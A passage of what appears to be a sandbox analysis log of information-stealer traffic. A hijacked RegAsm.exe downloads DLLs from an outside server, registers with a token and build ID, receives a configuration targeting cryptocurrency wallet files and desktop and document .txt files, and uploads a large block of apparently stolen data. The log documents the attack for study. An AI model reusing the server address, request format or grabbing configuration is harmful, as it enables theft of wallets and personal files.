2024-04-23 19:44:20 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-23 19:44:20 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-23 19:44:20 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49725	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:20 UTC	162	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Cache-Control: no-cache
2024-04-23 19:44:21 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:21 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-04-23 19:44:21 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-23 19:44:21 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-23 19:44:21 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-04-23 19:44:21 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-23 19:44:22 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49726	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:22 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:22 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IJDHDGDAAAAKFIDGHJDGCont
2024-04-23 19:44:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:23 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49727	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:24 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:24 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CBFBGCGIJKJJKFIDBFCGCont
2024-04-23 19:44:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:25 UTC	131	IN	Data Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49728	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:25 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:25 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------JDGIECGIEBKJJJJKEGHJCont
2024-04-23 19:44:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49729	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:28 UTC	265	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 122813 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CBGCBKFBGIIIECAAAKFCCont
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 73 73 4a 38 36 46 56 4c 48 70 75 34 79 78 7a 6e 48 46 58 5a 50 45 46 70 44 64 33 56 74 49 72 71 39 76 47 30 6a 59 64 47 79 42 6a 50 41 59 6b 64 52 39 34 43 67 44 56 6f 72 4a 2f 74 61 63 36 6a 61 51 66 59 4a 6b 69 6e 69 64 32 5a 6d 6a 4a 58 42 47 44 6b 4f 52 6a 42 7a 78 6e 71 50 65 6e 36 5a 72 74 6e 71 30 30 6b 64 73 53 53 69 37 67 64 36 48 63 4d 34 7a 68 57 4a 48 30 59 41 2b 31 41 47 6e 52 57 4c 64 36 79 7a 57 4d 73 39 74 46 4d 69 78 58 43 52 2b 5a 68 47 44 2f 76 41 72 41 41 45 6e 50 58 71 41 65 61 6e 47 74 52 6d 4d 2f 77 43 69 33 50 32 67 54 65 54 39 6d 77 75 38 74 74 33 64 64 32 33 47 33 6e 4f 61 41 4e 4f 69 73 73 36 30 68 45 53 78 57 64 31 4a 4e 49 48 2f 41 48 53 68 51 79 6c 43 41 77 4f 57 41 34 4a 39 61 6a 73 39 61 6b 6e 30 2b 30 6c 6b 73 70 6d 75 72 Data Ascii: ssJ86FVLHpu4yxznHFXZPEFpDd3VtIrq9vG0jYdGyBjPAYkdR94CgDVorJ/tac6jaQfYJkinid2ZmjJXBGDkORjBzxnqPen6Zrtnq00kdsSSi7gd6HcM4zhWJH0YA+1AGnRWLd6yzWMs9tFMixXCR+ZhGD/vArAAEnPXqAeanGtRmM/wCi3P2gTeT9mwu8tt3dd23G3nOaANOiss60hESxWd1JNIH/AHShQylCAwOWA4J9ajs9akn0+0lkspmur
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 64 4e 7a 43 34 59 4e 49 66 75 34 7a 6b 63 63 59 48 70 55 76 2f 43 63 2b 47 50 2b 67 33 61 66 39 39 30 66 38 4a 7a 34 58 2f 36 44 64 70 2f 33 33 52 79 53 37 42 7a 78 37 68 64 65 45 62 4b 2f 76 70 4c 6d 2f 75 62 6d 36 52 72 56 37 52 49 48 45 61 72 48 47 34 41 59 42 6c 51 50 7a 6a 75 78 47 54 6e 30 78 6f 36 56 70 30 2b 6d 77 4e 46 4e 71 74 37 71 41 34 43 74 64 69 4c 4b 41 44 6f 44 47 69 35 2f 48 4a 72 4f 2f 77 43 45 35 38 4c 2f 41 50 51 62 74 50 38 41 76 75 6a 2f 41 49 54 6e 77 76 38 41 39 42 75 30 2f 77 43 2b 36 4f 53 58 59 4f 65 50 63 36 43 69 75 66 38 41 2b 45 35 38 4c 2f 38 41 51 62 74 50 2b 2b 36 50 2b 45 35 38 4c 2f 38 41 51 62 74 50 2b 2b 36 4f 53 58 59 4f 65 50 63 36 43 69 75 66 2f 77 43 45 35 38 4c 2f 41 50 51 62 74 50 38 41 76 75 6a 2f 41 49 54 6e Data Ascii: dNzC4YNIfu4zkccYHpUv/Cc+GP+g3af990f8Jz4X/6Ddp/33RyS7Bzx7hdeEbK/vpLm/ubm6RrV7RIHEarHG4AYBlQPzjuxGTn0xo6Vp0+mwNFNqt7qA4CtdiLKADoDGi5/HJrO/wCE58L/APQbtP8Avuj/AITnwv8A9Bu0/wC+6OSXYOePc6Ciuf8A+E58L/8AQbtP++6P+E58L/8AQbtP++6OSXYOePc6Ciuf/wCE58L/APQbtP8Avuj/AITn
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 78 2f 38 41 78 4e 48 2f 41 41 6d 58 69 48 2f 6f 4a 48 2f 76 7a 48 2f 38 54 58 6a 66 32 54 69 65 79 2b 38 2b 6a 2f 74 37 42 39 33 39 78 36 33 58 6d 66 78 43 2f 77 43 52 69 68 2f 36 39 45 2f 39 44 65 71 48 2f 43 5a 65 49 66 38 41 6f 4a 48 2f 41 4c 38 78 2f 77 44 78 4e 5a 6d 6f 61 6c 65 61 70 63 43 34 76 5a 6a 4e 4b 45 43 42 74 6f 58 35 51 53 63 63 41 44 75 61 36 73 46 6c 31 65 6a 58 6a 55 6e 73 72 2f 6b 63 4f 5a 5a 76 68 73 52 68 5a 55 71 62 64 33 62 70 35 70 6c 57 6a 74 52 52 58 76 6e 79 67 6c 46 4c 69 6b 6f 47 46 46 46 46 41 42 52 52 52 51 41 55 6c 4c 53 55 44 43 69 69 69 67 41 70 4b 57 69 67 42 4b 4b 4b 4b 41 43 69 69 69 67 59 55 55 55 55 41 49 61 4b 4d 30 55 44 43 6b 70 61 4b 41 45 6f 70 61 53 6d 41 6c 46 4c 53 55 44 43 6b 70 61 4d 55 44 45 6f 70 63 55 Data Ascii: x/8AxNH/AAmXiH/oJH/vzH/8TXjf2Tiey+8+j/t7B939x63XmfxC/wCRih/69E/9DeqH/CZeIf8AoJH/AL8x/wDxNZmoaleapcC4vZjNKECBtoX5QSccADua6sFl1ejXjUnsr/kcOZZvhsRhZUqbd3bp5plWjtRRXvnyglFLikoGFFFFABRRRQAUlLSUDCiiigApKWigBKKKKACiiigYUUUUAIaKM0UDCkpaKAEopaSmAlFLSUDCkpaMUDEopcU
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 4d 48 2b 33 2b 56 46 6d 46 69 31 4b 4d 32 64 31 2f 31 79 2f 71 4b 7a 39 4e 4f 4a 32 2f 33 61 66 4a 71 4d 52 74 35 55 54 64 6c 31 32 38 6a 33 42 71 74 5a 33 43 57 38 72 4d 2b 63 46 63 63 55 52 69 30 6d 4b 78 72 30 56 56 2f 74 43 33 78 31 66 38 71 54 2b 30 62 66 38 41 76 4e 2b 56 46 6d 4f 78 62 7a 53 35 71 6e 2f 61 46 74 6e 37 7a 2f 6c 53 2f 77 42 6f 32 33 39 35 76 2b 2b 61 4c 4d 4c 46 71 67 39 4b 71 66 32 6a 61 2f 33 6d 2f 77 43 2b 61 50 37 53 74 76 37 7a 66 39 38 30 57 59 37 46 75 69 71 6e 39 6f 32 33 39 35 2f 2b 2b 61 50 37 52 74 76 37 7a 2f 38 41 66 4e 46 6d 46 6d 57 38 2b 6c 4c 56 4d 61 6c 61 2f 77 42 35 2f 77 44 76 6d 6c 